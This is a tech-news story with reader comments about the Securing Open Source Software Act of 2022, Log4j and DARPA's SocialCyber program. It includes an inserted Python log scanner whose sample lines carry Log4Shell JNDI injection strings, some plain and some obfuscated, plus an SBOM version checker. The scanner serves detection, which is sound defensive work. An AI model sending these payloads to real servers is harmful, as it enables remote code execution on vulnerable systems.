from the homespun-security dept.
US Senators Gary Peters (D-MI) and Rob Portman (R-OH) introduced S.4913 - Securing Open Source Software Act of 2022 the other day. It has been read twice and referred to the Committee on Homeland Security and Governmental Affairs. Here is the US Senate's press release:
U.S. Senators Gary Peters (D-MI) and Rob Portman (R-OH), Chairman and Ranking Member of the Homeland Security and Governmental Affairs Committee, introduced bipartisan legislation to help protect federal and critical infrastructure systems by strengthening the security of open source software. The legislation comes after a hearing convened by Peters and Portman on the Log4j incident earlier this year, and would direct the Cybersecurity and Infrastructure Security Agency (CISA) to help ensure that open source software is used safely and securely by the federal government, critical infrastructure, and others. A vulnerability discovered in Log4j – which is widely used open source code – affected millions of computers worldwide, including critical infrastructure and federal systems. This led top cybersecurity experts to call it one of the most severe and widespread cybersecurity vulnerabilities ever seen.
[...] The overwhelming majority of computers in the world rely on open source code – freely available code that anyone can contribute to, develop, and use to create websites, applications, and more. It is maintained by a community of individuals and organizations. The federal government, one of the largest users of open source software in the world, must be able to manage its own risk and also help support the security of open source software in the private sector and the rest of the public sector.
The Securing Open Source Software Act would direct CISA to develop a risk framework to evaluate how open source code is used by the federal government. CISA would also evaluate how the same framework could be voluntarily used by critical infrastructure owners and operators. This will identify ways to mitigate risks in systems that use open source software. The legislation also requires CISA to hire professionals with experience developing open source software to ensure that government and the community work hand-in-hand and are prepared to address incidents like the Log4j vulnerability. Additionally, the legislation requires the Office of Management and Budget (OMB) to issue guidance to federal agencies on the secure usage of open source software and establishes a software security subcommittee on the CISA Cybersecurity Advisory Committee.
Software freedom is not named explicitly in their definition, as far as their diff^wtext goes, nor are the free-of-charge, royalty-free aspects mentioned. Yet the text of S.4913 nevertheless seems to be a nod in the direction of Free Software:
(5) OPEN SOURCE SOFTWARE.—The term 'open source software' means software for which the human-readable source code is made available to the public for use, study, re-use, modification, enhancement, and re-distribution.
Behind the scenes, representatives from Microsoft appear to be milking the log4j circus for gain as shown by multiple other articles, not linked to here, and their vastly increased activity and presence in DC.
Overall, the legislative process needs to find a way to use versioning software so that all the "inserting before ...", "inserting after ...", "redesignating paragraphs ...", and other modifications can be easily processed and the current draft made easily visible. However, that's not as simple as opening an account on GitLab or Src.ht and letting m$ and the rest of the world hammer at it unauthenticated and uncurated.
(2022) The US Military Wants To Understand The Most Important Software On Earth
(2021) 'The Internet's on Fire': Techs Race to Fix Major Cybersecurity Software Flaw
'The Internet is on Fire'
The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.
For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out a least some protection even for customers on its free tier of service.
All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
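The mechanism the article describes, a string that merely gets logged triggering a lookup, is also what makes the payload visible in the request data and logs a defender already has. The following is an added example, not code from WIRED, LunaSec or the Log4j project: a small scanner that undoes the obfuscation tricks seen in the wild (nested `${lower:...}` and `${::-x}` lookups, percent-encoding) before matching, so that a naive grep for `${jndi:` is not the only line of defence. The access-log lines are constructed for the example and use RFC 5737 documentation addresses; the set of lookups modelled is my own selection of the ones used for obfuscation, not the full Log4j lookup list.

```python
import re
import urllib.parse

# Innermost Log4j lookup, i.e. ${...} whose body contains no nested ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>://<host[:port]>...
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Resolve one lookup body the way Log4j 2.x would when the attacker
    relies on it for obfuscation. Only the lookups seen in public payloads
    are modelled (lower/upper and the ':-' default-value syntax); anything
    else, including the jndi lookup itself, is left unresolved."""
    if ":-" in body:
        # ${::-j} or ${env:NOPE:-j}: the variable is empty/unset, so Log4j
        # substitutes the default value after ':-'.
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return "${" + body + "}"


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Expand nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if expanded == text:
            break
        text = expanded
    return text


def url_decode(text: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding used to slip past naive filters."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(lines):
    """Return one finding per log line that carries a JNDI lookup after
    decoding: the line index, the JNDI scheme (ldap, rmi, dns, ...) and the
    host[:port] the victim would have connected to."""
    findings = []
    for i, raw in enumerate(lines):
        decoded = deobfuscate(url_decode(raw))
        m = JNDI_LOOKUP.search(decoded)
        if m:
            findings.append({"line": i, "scheme": m.group(1).lower(),
                             "target": m.group(2), "decoded": decoded})
    return findings


# Constructed sample: combined-format web server access lines; the
# attacker-controlled fields are the request path and the User-Agent.
LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.9:1099/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.9:1389/c}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.9%2Fd%7D HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.11 - - [10/Dec/2021:14:02:16 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"line {f['line']}: jndi {f['scheme']} -> {f['target']}")
```

Run as a script it prints one line per hit; the last sample line carries a harmless `${date:...}` lookup and is deliberately not flagged. Spotting inbound strings is triage only: the fix is upgrading log4j-core (2.16.0 disabled JNDI by default and removed message lookups).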
The MIT Technology Review writes in a long-form article about how DARPA has rediscovered Free and Open Source Software, or at least the latter, and how it is now found everywhere across the board. As far as the Internet and the World Wide Web go, its ubiquity has been a given since they were founded on it, but nowadays at least 70% of closed-source, proprietary products also contain lots of it. DARPA is worried about the kernel Linux in particular, and specifically about the vetting process for adding code to the project.
Now DARPA, the US military's research arm, wants to understand the collision of code and community that makes these open-source projects work, in order to better understand the risks they face. The goal is to be able to effectively recognize malicious actors and prevent them from disrupting or corrupting crucially important open-source code before it's too late.
DARPA's "SocialCyber" program is an 18-month-long, multimillion-dollar project that will combine sociology with recent technological advances in artificial intelligence to map, understand, and protect these massive open-source communities and the code they create. It's different from most previous research because it combines automated analysis of both the code and the social dimensions of open-source software.
"The open-source ecosystem is one of the grandest enterprises in human history," says Sergey Bratus, the DARPA program manager behind the project.
"It's now grown from enthusiasts to a global endeavor forming the basis of global infrastructure, of the internet itself, of critical industries and mission-critical systems pretty much everywhere," he says. "The systems that run our industry, power grids, shipping, transportation."
Recently, software appears to have been occupying a lot of attention over in Washington, DC. Unfortunately, occasional lines in mainstream articles indicate that it is M$ and M$ lobbyists that are steering the policy discussion there. They appear to be spending an enormous amount of time in direct contact with politicians and policy makers, all the while milking log4j as a distraction from the actively exploited vulnerabilities in their own products.
(Score: 3, Interesting) by ElizabethGreene on Wednesday September 28 2022, @05:29PM (5 children)
Bias disclosure: I work for Microsoft, therefore my opinion is invalid.
I'd like to see the framework requirements in Sec 2220E.c.2.A (https://www.congress.gov/bill/117th-congress/senate-bill/4913/text#id2E6B3340D2094A61B77A7380FFAB5D39) expanded to include both Open and Closed Source software. It's not unreasonable to ask all federal software vendors to include an OSS BOM and simultaneously answer those questions vis-a-vis their software.
The requirements from that section are...
Realistically though, knowing what a clown-show the federal procurement process is, $Vendors are unlikely to let that happen.
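What an OSS BOM from a vendor would actually buy a reviewer is illustrated by the following added example, which is mine and not the commenter's, the bill's or any vendor's code: a check that walks a CycloneDX JSON SBOM and flags any log4j-core component whose version falls in the CVE-2021-44228 (Log4Shell) range. The SBOM is constructed for the example; the affected range and the exempted back-port releases are my reading of the published advisory and in practice would be pulled from a vulnerability feed rather than hand-maintained.

```python
import json
import re

# Versions of org.apache.logging.log4j:log4j-core affected by CVE-2021-44228
# as published in the advisory: 2.0-beta9 through 2.14.1, minus the later
# back-port releases on the 2.3.x and 2.12.x branches that carry the fix.
# Assumption: in production this data comes from a vulnerability feed.
LOG4J_CORE = ("org.apache.logging.log4j", "log4j-core")
AFFECTED_LOW = "2.0-beta9"
AFFECTED_HIGH = "2.14.1"
FIXED_BACKPORTS = {"2.3.1", "2.3.2", "2.12.2", "2.12.3", "2.12.4"}


def parse_version(v: str):
    """Map '2.14.1' or '2.0-beta9' to a tuple that sorts like Maven does:
    numeric parts first, then a pre-release marker that sorts before the
    final release of the same number."""
    main, _, pre = v.partition("-")
    nums = tuple(int(x) for x in main.split("."))
    nums += (0,) * (3 - len(nums))
    if pre:
        m = re.match(r"([a-z]+)(\d*)", pre.lower())
        if m:
            return nums + (0, m.group(1), int(m.group(2) or 0))
        return nums + (0, pre.lower(), 0)
    return nums + (1,)


def is_affected_log4j_core(version: str) -> bool:
    """True if this log4j-core version is in the Log4Shell range."""
    if not version:
        return False
    v = parse_version(version)
    in_range = parse_version(AFFECTED_LOW) <= v <= parse_version(AFFECTED_HIGH)
    return in_range and version not in FIXED_BACKPORTS


def find_affected(sbom_text: str):
    """Walk a CycloneDX JSON SBOM and return the log4j-core components whose
    version is affected, matched on group/name with the purl as fallback."""
    sbom = json.loads(sbom_text)
    hits = []
    for comp in sbom.get("components", []):
        group, name = comp.get("group"), comp.get("name")
        purl = comp.get("purl", "")
        is_core = (group, name) == LOG4J_CORE or purl.startswith(
            "pkg:maven/%s/%s@" % LOG4J_CORE)
        if is_core and is_affected_log4j_core(comp.get("version", "")):
            hits.append({"purl": purl or f"{group}:{name}",
                         "version": comp["version"]})
    return hits


# Constructed CycloneDX 1.4 SBOM: one vulnerable log4j-core, one patched copy
# (a shaded second copy is common), a fixed back-port without a purl, and
# unrelated libraries that must not be flagged.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.17.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.12.2"},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
     "version": "2.13.0", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.13.0"}
  ]
}
"""

if __name__ == "__main__":
    for hit in find_affected(SBOM_JSON):
        print("affected:", hit["purl"])
```

The point of the exercise is that the question "does this product ship a vulnerable log4j-core" becomes mechanical once the vendor supplies the BOM; without it, the same question takes a decompiler and a guess about which shaded jar is which.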
(Score: 2) by Thexalon on Wednesday September 28 2022, @07:37PM (1 child)
So the thing about that is that doing that with closed-source software is basically impossible:
1. You can't simply rely on what the vendor tells you, because all vendors regardless of their condition will swear on their mother's grave that their software is perfectly secure, extremely popular, with minimal risk, and has a healthy community of support staff and users. That largely renders points (i), (ii), (iv), (v), and (vi) in your list moot.
2. You can't really rely on the vendor sharing source code with the government to verify point (i), because the code that gets compiled / interpreted and released might not match the code shared with the government.
3. Even if you have a scrupulously honest vendor, the often-closed-source compiler / interpreter might be intentionally introducing vulnerabilities.
4. The number and severity of publicly-known, unpatched vulnerabilities, point (iii), really isn't a great metric when comparing open-source and closed-source software, because closed-source software is more likely to have not-publicly-known but unpatched vulnerabilities, simply because there are fewer good-guy eyes looking at the code for problems.
Doing this really right would involve having the government, probably under the NSA or somebody like that, with a team of programmers going through any open-source package used by the US government and contributing security fixes, which would also help all the private users of that package. So far, they've been reluctant to do that, largely because while they want the US government secure they also want foreign governments insecure so they can get a signal-intelligence advantage. So what we're probably going to see come out of this is a US-government version of the less secure software that gets deployed onto their machines but is not distributed.
The only thing that stops a bad guy with a compiler is a good guy with a compiler.
(Score: 2, Interesting) by Sjolfr on Wednesday September 28 2022, @09:48PM
3.5 - there is no way to see the competency of closed source developers, so any guidelines become useless pretty quick.
Most opensource projects would eventually reject government packages because they would be introducing specific things that may break the vision of the developers anyway. That's the beauty of opensource ... government can hire vetted developers and make changes to the code and produce government only packages.
And, much like the UofMN failed attempts that got them banned from linux kernel contributions, they (gov or individuals) can easily see and track all the code and remove the crap some idiot/terrorist tries to add.
Opensource is a government dream as long as they can keep competent developers on staff.
(Score: 2) by legont on Thursday September 29 2022, @11:51PM (2 children)
C, C++ and Assembly do not qualify.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 2) by ElizabethGreene on Friday September 30 2022, @02:56AM (1 child)
No language is memory safe if you use it wrong enough. :)
(Score: 2) by legont on Friday September 30 2022, @08:48PM
You are probably right, but my point was the legal angle. Are we about to outlaw C? It is a very serious question.
"Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
(Score: 0) by Anonymous Coward on Wednesday September 28 2022, @07:48PM
Our friends, The Corporations have told us
RMS and his spawn are evil, so we will nibble them to death with ducks.
(Score: 1, Insightful) by Anonymous Coward on Wednesday September 28 2022, @07:59PM
Coincidence, or conspiracy?
(Score: 2) by HammeredGlass on Wednesday September 28 2022, @09:18PM
Anything he's slapping his name on is guaranteed garbage from the start. Reading through this bill will most likely prove me out.
(Score: 3, Informative) by SomeRandomGeek on Wednesday September 28 2022, @10:46PM
To be used by the (US Federal) government, software must comply with certain rules, many of which relate to security. I have been through the process to make closed source software comply with the rules. I can say from experience that the compliance process tends to improve security significantly (for a commercial product where security was an afterthought at best.) But it does not produce the same level of security as a "security first" mentality. And it's a huge pain in the ass. Because of this, I think it is in the interest of the government to pay to make compliant forks of open source projects that they are interested in. But I don't think it is really in the interest of the maintainers of those projects to make the trunk compliant. It's too expensive (in terms of slowing down their development) for the security benefits it brings in. It is probably in everyone's best interest for the government to pay the maintainers to fix security bugs upstream rather than to try to fix them themselves in their fork.
(Score: 0, Offtopic) by Tokolosh on Thursday September 29 2022, @12:47AM
The most terrifying words in the English language are: "I'm from the government and I'm here to help."